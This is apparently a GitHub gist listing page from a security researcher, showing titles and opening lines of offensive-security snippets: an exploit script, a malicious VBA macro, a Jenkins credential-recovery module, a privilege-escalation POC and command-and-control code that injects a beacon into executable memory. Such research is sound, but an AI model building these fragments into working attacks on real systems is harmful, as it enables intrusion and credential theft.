This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from scapy.all import * | |
| from scapy.utils import rdpcap | |
| import sys | |
| import struct | |
| from pwn import * | |
| MESSAGE_TYPE_SYN = 0x00 | |
| MESSAGE_TYPE_MSG = 0x1 | |
| MESSAGE_TYPE_PING = 0xFF |
xpn
/ bigpicture-exploit.py
Created
April 25, 2017 23:38
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import struct | |
| WIDTH = 1 | |
| HEIGHT = 1000000 | |
| LOCAL = False | |
| if LOCAL: | |
| FREE_HOOK_OFFSET = -1230952 |
xpn
/ wannacry_file_extensions.txt
Created
May 12, 2017 23:41
A list of file extensions searched and encrypted by the WannaCry ransomware
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .der | |
| .pfx | |
| .key | |
| .crt | |
| .csr | |
| .p12 | |
| .pem | |
| .odt | |
| .ott | |
| .sxw |
xpn
/ APT28 Hospitality docm VBA
Created
August 12, 2017 11:17
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Attribute VB_Name = "ThisDocument" | |
| Attribute VB_Base = "1Normal.ThisDocument" | |
| Attribute VB_GlobalNameSpace = False | |
| Attribute VB_Creatable = False | |
| Attribute VB_PredeclaredId = True | |
| Attribute VB_Exposed = True | |
| Attribute VB_TemplateDerived = True | |
| Attribute VB_Customizable = True | |
| Sub AutoOpen() | |
| Execute |
xpn
/ apt33_dropshot_decoder.py
Created
September 20, 2017 22:30
IDAPython encrypted string decoder for DROPSHOT - APT33
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import idc | |
| import idaapi | |
| from idautils import * | |
| decryptTable = 0x41BA3C | |
| decryptTableEnd = 0x41BA77 | |
| decryptFunction = 0x4012A0 | |
| # Get the translation table | |
| bytes = idaapi.get_many_bytes(decryptTable, decryptTable-decryptTableEnd) |
xpn
/ jenkins_passwords.rb
Created
October 15, 2017 15:27
Recover jenkins credentials in meterpreter
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # This module requires Metasploit: https://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| require 'nokogiri' | |
| require 'digest' | |
| require 'openssl' | |
| require 'base64' |
xpn
/ msigen.wix
Created
November 6, 2017 22:41
WIX file with embedded Powershell, which will be executed as SYSTEM
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0"?> | |
| <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi"> | |
| <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033"> | |
| <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/> | |
| <Media Id="1" Cabinet="product.cab" EmbedCab="yes"/> | |
| <Directory Id="TARGETDIR" Name="SourceDir"> | |
| <Directory Id="ProgramFilesFolder"> | |
| <Directory Id="INSTALLLOCATION" Name="Example"> | |
| <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222"> |
xpn
/ getsystem_parent.cpp
Created
November 20, 2017 00:11
A POC to grab SYSTEM token privileges via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) { | |
| TOKEN_PRIVILEGES tp; | |
| LUID luid; | |
| TOKEN_PRIVILEGES tpPrevious; | |
| DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES); | |
| if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE; |
xpn
/ external_controller.py
Last active
March 9, 2023 03:03
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import struct | |
| import time | |
| class ExternalC2Controller: | |
| def __init__(self, port): | |
| self.port = port | |
| def encodeFrame(self, data): | |
| return struct.pack("<I", len(data)) + data |
xpn
/ external_client.cpp
Created
March 28, 2018 22:06
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| // Allocates a RWX page for the CS beacon, copies the payload, and starts a new thread | |
| void spawnBeacon(char *payload, DWORD len) { | |
| HANDLE threadHandle; | |
| DWORD threadId = 0; | |
| char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
| memcpy(alloc, payload, len); |